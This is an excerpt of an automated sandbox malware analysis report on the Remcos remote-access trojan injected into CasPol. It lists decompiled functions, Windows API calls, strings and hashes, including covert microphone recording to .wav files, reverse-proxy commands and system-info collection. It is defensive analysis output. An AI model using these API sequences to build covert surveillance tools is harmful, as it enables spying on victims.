                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00446E01
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00446E0C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00446E17
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00446E22
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00446E2D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00446E38
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00446E46
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                                                                                                  • Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85
                                                                                                                                                                                                                                  Function 1001695C Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10016970
                                                                                                                                                                                                                                    • Part of subcall function 10015A65: RtlFreeHeap.NTDLL(00000000,00000000,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?), ref: 10015A7B
                                                                                                                                                                                                                                    • Part of subcall function 10015A65: GetLastError.KERNEL32(?,?,1001CD2C,?,00000000,?,00000000,?,1001CD53,?,00000007,?,?,1001A21D,?,?), ref: 10015A8D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001697C
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10016987
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 10016992
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 1001699D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 100169A8
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 100169B3
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 100169BE
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 100169C9
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 100169D7
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 776569668-0
                                                                                                                                                                                                                                  • Opcode ID: 5ceb0c3dd41d8749c3e5c53e13c3ee82ab575277eefb845cca99943617a416a4
                                                                                                                                                                                                                                  • Instruction ID: 4486635b9f067f5c856a3a66de58a1cd354bc26f8124cf63660485fb98f8bcde
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5ceb0c3dd41d8749c3e5c53e13c3ee82ab575277eefb845cca99943617a416a4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AC11447A550108FFCB01DF54C982CD93BA5EF08651F9D82A5F9498F622DA32EF909B81
                                                                                                                                                                                                                                  Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Eventinet_ntoa
                                                                                                                                                                                                                                  • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
                                                                                                                                                                                                                                  • API String ID: 3578746661-4192532303
                                                                                                                                                                                                                                  • Opcode ID: 8df7f257eef9b2c28c9341c31835349b90e6dee982a5f2442add6739e0b68c40
                                                                                                                                                                                                                                  • Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8df7f257eef9b2c28c9341c31835349b90e6dee982a5f2442add6739e0b68c40
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F
                                                                                                                                                                                                                                  Function 00455139 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455DAF), ref: 0045515C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DecodePointer
                                                                                                                                                                                                                                  • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                                                                                  • API String ID: 3527080286-3064271455
                                                                                                                                                                                                                                  • Opcode ID: ab61d69453e4831c81f6a46e39f254611e12c2bb616dca0b6d42b24218e76fcf
                                                                                                                                                                                                                                  • Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ab61d69453e4831c81f6a46e39f254611e12c2bb616dca0b6d42b24218e76fcf
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D
                                                                                                                                                                                                                                  Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C
                                                                                                                                                                                                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                                                                                                  • Sleep.KERNEL32(00000064), ref: 00416688
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(00000000), ref: 004166BC
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                                                                                                  • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                                                                                                  • API String ID: 1462127192-2001430897
                                                                                                                                                                                                                                  • Opcode ID: 368e340a77b9c0e8bffa247c5fc6be13377d75c74f6c97ac0aaf6df9c88f7582
                                                                                                                                                                                                                                  • Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 368e340a77b9c0e8bffa247c5fc6be13377d75c74f6c97ac0aaf6df9c88f7582
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D
                                                                                                                                                                                                                                  Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _strftime.LIBCMT ref: 00401AD3
                                                                                                                                                                                                                                    • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                                                                                                                                                  • waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
                                                                                                                                                                                                                                  • waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
                                                                                                                                                                                                                                  • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                                                                                                  • String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
                                                                                                                                                                                                                                  • API String ID: 3809562944-3643129801
                                                                                                                                                                                                                                  • Opcode ID: 126357b6d54d8c6b8d9661e07f6eaafbb2250238a1c2482dec3260737e9f4809
                                                                                                                                                                                                                                  • Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 126357b6d54d8c6b8d9661e07f6eaafbb2250238a1c2482dec3260737e9f4809
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A
                                                                                                                                                                                                                                  Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
                                                                                                                                                                                                                                  • waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
                                                                                                                                                                                                                                  • waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
                                                                                                                                                                                                                                  • waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
                                                                                                                                                                                                                                  • waveInStart.WINMM ref: 00401A81
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                                                                                                                                                                                                                  • String ID: XCG$`=G$x=G
                                                                                                                                                                                                                                  • API String ID: 1356121797-903574159
                                                                                                                                                                                                                                  • Opcode ID: 26fe90a91a06c390124097d879efed6aeabfafde605fe0cb44867ace1fe750fb
                                                                                                                                                                                                                                  • Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 26fe90a91a06c390124097d879efed6aeabfafde605fe0cb44867ace1fe750fb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C
                                                                                                                                                                                                                                  Function 0041C96F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988
                                                                                                                                                                                                                                    • Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
                                                                                                                                                                                                                                    • Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
                                                                                                                                                                                                                                    • Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91
                                                                                                                                                                                                                                  • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
                                                                                                                                                                                                                                  • lstrcpynA.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
                                                                                                                                                                                                                                  • Shell_NotifyIconA.SHELL32(00000000,00473B50), ref: 0041C9EF
                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 0041C9FB
                                                                                                                                                                                                                                  • DispatchMessageA.USER32(?), ref: 0041CA05
                                                                                                                                                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                                                                                  • String ID: Remcos
                                                                                                                                                                                                                                  • API String ID: 1970332568-165870891
                                                                                                                                                                                                                                  • Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                                                                                                  • Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D
                                                                                                                                                                                                                                  Function 0044B450 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                  • Opcode ID: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
                                                                                                                                                                                                                                  • Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fcc2c2816786db3331fe4fa4cc48332b155136c474820dd8e562c8cdfa0ddddc
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9
                                                                                                                                                                                                                                  Function 00452B2A Relevance: 13.8, APIs: 9, Instructions: 268COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00452C91
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
                                                                                                                                                                                                                                  • __alloca_probe_16.LIBCMT ref: 00452D3B
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D03
                                                                                                                                                                                                                                    • Part of subcall function 00446AFF: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433627,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B31
                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452D7F
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00452DAA
                                                                                                                                                                                                                                  • __freea.LIBCMT ref: 00452DB6
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 201697637-0
                                                                                                                                                                                                                                  • Opcode ID: b1c83994ecbe3f941fd24685bb9664c395dd4006a3bd2ce5fbc620e0f8a5dfb4
                                                                                                                                                                                                                                  • Instruction ID: c0da75549b7b47b94c7346473649b17197e9394d7568cc7349c1d05b16f9ad8a
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b1c83994ecbe3f941fd24685bb9664c395dd4006a3bd2ce5fbc620e0f8a5dfb4
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F391D872E002169BDF218E64CA51EEF7BB5AF0A315F14055BEC04E7243D7A9DC48CB68
                                                                                                                                                                                                                                  Function 100196F5 Relevance: 13.7, APIs: 9, Instructions: 210COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3869010303.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868935399.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.000000001002B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010030000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3869010303.0000000010032000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3870622310.0000000010033000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$EnvironmentVariable_wcschr
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 487594629-0
                                                                                                                                                                                                                                  • Opcode ID: 03c505302b217a881feeb7d46bad7d441065908759d7a5648ba0d5e2c1f84832
                                                                                                                                                                                                                                  • Instruction ID: 24f0059e533d9f3fb59acd5008695e198d0c5eb1710b72595803e493e6dfdcaf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 03c505302b217a881feeb7d46bad7d441065908759d7a5648ba0d5e2c1f84832
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0616975904351ABD710DF78CC81A5EB7E4EF09760F5A426DF9419F2C1EA32E9818B90
                                                                                                                                                                                                                                  Function 04571CCA Relevance: 13.6, APIs: 9, Instructions: 84fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 04571D1B
                                                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 04571D37
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 04571D4B
                                                                                                                                                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 04571D58
                                                                                                                                                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 04571D72
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 04571D7D
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 04571D8A
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3868412859.0000000004571000.00000040.00001000.00020000.00000000.sdmp, Offset: 04570000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868336669.0000000004570000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3868412859.0000000004586000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_4570000_CasPol.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1454806937-0
                                                                                                                                                                                                                                  • Opcode ID: 8fabf9394096bb04337fbd22e37506ad8c371af595785d63fd4f5eaa012ad523
                                                                                                                                                                                                                                  • Instruction ID: 5b110631bde36cff5e767a99cb9c84bee5f03a4e5a77b9237b2537033a0646bd
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8fabf9394096bb04337fbd22e37506ad8c371af595785d63fd4f5eaa012ad523
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A21FF7194121DBFEB109BA0BC8CEEA76BCFF58354F000975F515E2140E674AE49AB70
                                                                                                                                                                                                                                  Function 004443F9 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                  • _memcmp.LIBVCRUNTIME ref: 004446A3
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00444714
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044472D
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 0044475F
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00444768
                                                                                                                                                                                                                                  • _free.LIBCMT ref: 00444774
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                                                                                  • String ID: C
                                                                                                                                                                                                                                  • API String ID: 1679612858-1037565863
